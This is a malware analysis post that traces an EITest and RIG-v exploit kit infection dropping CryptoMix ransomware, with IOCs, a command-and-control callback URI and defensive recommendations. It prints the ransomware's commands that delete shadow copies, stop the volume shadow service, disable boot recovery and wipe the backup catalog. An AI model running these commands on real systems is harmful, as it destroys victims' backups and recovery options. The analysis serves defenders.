IOCs:
- 68.178.254.116 – westwoodenabler.com – Compromised website
- 92.53.120.233 – top.tbn1.us – RIG-v EK
- 91.121.244.84 – CryptoMix callback traffic
Traffic:
Hashes:
SHA256: 76cd48af0b8a0dbaa9260996cd4347a811bc0a09efce18c9d25f7cc59828d335
File name:RIG-v Flash Exploit.swf
SHA256: 3ff4c80212d97aa64154dc3bd6a361766286c5073d15ec65cb32fe2755f8a703
File name: QTTYUADAF
SHA256: 038bfb53f45a596762be789c66663966ef9bf04c1c80aae339f40e9a5fe3088c
File name: “radC79C9.tmp.exe” and “Spy Security SoftWare_91bf6e5_aed68d54.exe”
Hybrid-Analysis Report
Infection Chain:
The infection chain started off with me browsing to the compromised website. Injected in the source code of the page was the EITest script:
The URL contained within the script shown above returns the RIG-v “pre-landing” page. This pre-landing page contains more script that checks if the browser is IE. If the host is using IE it is redirected to the landing page via a POST method.
I won’t be posting a full image of the pre-landing page in this post since I already did that in a previous one. Also, a brief explanation of the checks being performed by the pre-landing page can be found here.
Next we see the usual GET request for a Flash exploit, a JS downloader being dropped in %Temp%, and the GET request for the RIG-v EK payload.
Below is an image of the JS downloader and CryptoMix payload in %Temp%. The executable is also copied in the ProgramData folder under the name “Spy Security Software_xxxxxxx_xxxxxxxx” (xxxxxxx_xxxxxxxx = host ID number):
Values are created in Run and RunOnce for persistence:
We then see the host make the following GET request using this URI query parameter:
91[.]121[.]244[.]84/ms_inforimation_os/os_check/101022/statistic_validos.php?info=nfuDISTF7Y6STYhjkfjuisskFDSA
They spelled information as “inforimation.” The response from the server is 401 Unauthorized and the line-based text data shows “os_valid: TRUE”:
The host then POST back your host “id_number” (OSID_xxxxxxxxxxxxxxx), “key_os” (RSA1 key), and “status” via HTML form items (key/value). The second POST is identical to the first except that the status now contains the value “DoneWorkEnd” (whereas before it was empty).
POST request URI: /ms_inforimation_os/os_check/101022/checks_os_valid.php
Making a direct request to the web server returns the following page:
The page is a direct copy of https://www.windows-commandline[.]com/find-windows-os-version-from-command/, which is a legitimate domain registered by Google (resolves to 104.25.85.12). All links on hxxp://91.121.244.84 redirect to windows-commandline[.]com.
Notable processes for radC79C9.tmp.exe include:
cmd.exe /C vssadmin.exe Delete Shadows /All /Quiet
vssadmin.exe Delete Shadows /All /Quiet
cmd.exe /C wmic shadowcopy delete
WMIC.exe wmic shadowcopy delete
cmd.exe /C net stop vss
net.exe net stop vss
net1.exe %WINDIR%system32net1 stop vss
cmd.exe /C bcdedit /set {default} recoveryenabled No
bcdedit.exe bcdedit /set {default} recoveryenabled No
cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
cmd.exe /C wbadmin delete catalog -quiet
wbadmin.exe wbadmin delete catalog -quiet
After the user’s files have been encrypted the filenames are appended with .email[supl@post.com]id[personal identification ID] and the file extension is changed to .lesli.
Lastly we see the ransom notes (INSTRUCTION RESTORE FILE.TXT) created in various folders as well as one dropped on the Desktop. The bottom of the ransom note says “LESLI SPYING ON YOU”:
My recommendations would be to block the RIG-v EK IP at your firewall(s) and to disable vssadmin.exe. To read more about why and how you should disable vssadmin.exe click HERE.